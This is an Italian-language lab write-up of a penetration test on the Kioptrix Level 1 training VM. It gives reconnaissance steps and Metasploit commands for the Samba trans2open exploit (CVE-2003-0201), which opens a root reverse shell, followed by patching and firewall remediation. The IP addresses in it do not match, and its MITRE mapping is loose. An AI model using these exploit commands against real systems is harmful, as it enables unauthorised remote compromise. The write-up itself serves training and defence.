Kioptrix Level 1: Audit e Sfruttamento delle Vulnerabilità a Spettro Completo
🏛️ Obiettivo Professionale
L'obiettivo era quello di eseguire un test di penetrazione strutturato sull'ambiente Kioptrix Level 1 per ottenere un compromesso completo come 'root' e documentare strategie di remediation tecniche adatte sia per le operazioni Red Team che Blue Team.
🏗️ Riproduzione dell'Ambiente (Storia Hardware)
I valori predefiniti della virtualizzazione moderna spesso falliscono su kernel legacy del 2010. Per avviare e mettere in rete correttamente questa macchina, sono state richieste le seguenti configurazioni architetturali specifiche:
- Sottotipo OS: Linux / Red Hat (32-bit).
- Architettura di Storage: Passaggio da SATA a Controller IDE per supportare il disco rigido legacy .vmdk.
- Protocollo di Rete: Configurato come PCI FAST-III con un adattatore Host-only per consentire la comunicazione interna con la macchina d'attacco Kali Linux.
⚔️ Analisi Offensiva (Percorso Red Team)
Lo sfruttamento ha seguito un ciclo di vita manuale dall'enumerazione allo sfruttamento:
1. Scoperta e Ricognizione
- Netdiscover: Utilizzato
netdiscover -r 192.168.184.4 per identificare l'IP target.
- Scan Nmap: Identificati servizi tra cui SSH (22), HTTP (80), RPC (111) e NetBIOS-SSN (139). Samba 2.2.1a è stato segnalato come punto di ingresso primario.
2. Sfruttamento (Samba trans2open)
- Vulnerabilità: CVE-2003-0201 (Heap Overflow).
- Mappa MITRE ATT&CK: - Tattica: Privilege Escalation (TA0004)
- Tecnica: Exploitation for Privilege Escalation (T1068)
- Protocollo Metasploit:
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- Risultato: Generata con successo una reverse shell. Il comando
whoami ha restituito root.
Per proteggere un ambiente aziendale, sono obbligatorie le seguenti strategie di Vulnerability Management (VM):
- Protocollo di Patching: Aggiornare Samba all'ultima versione supportata (Samba 4.x). La vulnerabilità nella funzione
call_trans2open è efficacemente corretta in tutte le versioni moderne.
- Hardening di Rete: Implementare firewall basati su host per limitare le Porte 139 e 445 solo a subnet interne fidate.
- Strategia del Ruolo VM: Questa remediation rientra nei cicli standard di Vulnerability Management durante l'orario lavorativo, garantendo la stabilità dell'infrastruttura.
📝 Prove Tecniche e Log Manuali
Le seguenti immagini documentano l'enumerazione manuale in tempo reale e l'esecuzione nel terminale:
Scoperta del Target e Note sull'Architettura


Prova di Accesso Root (Screenshot del Terminale)
Prova di shell root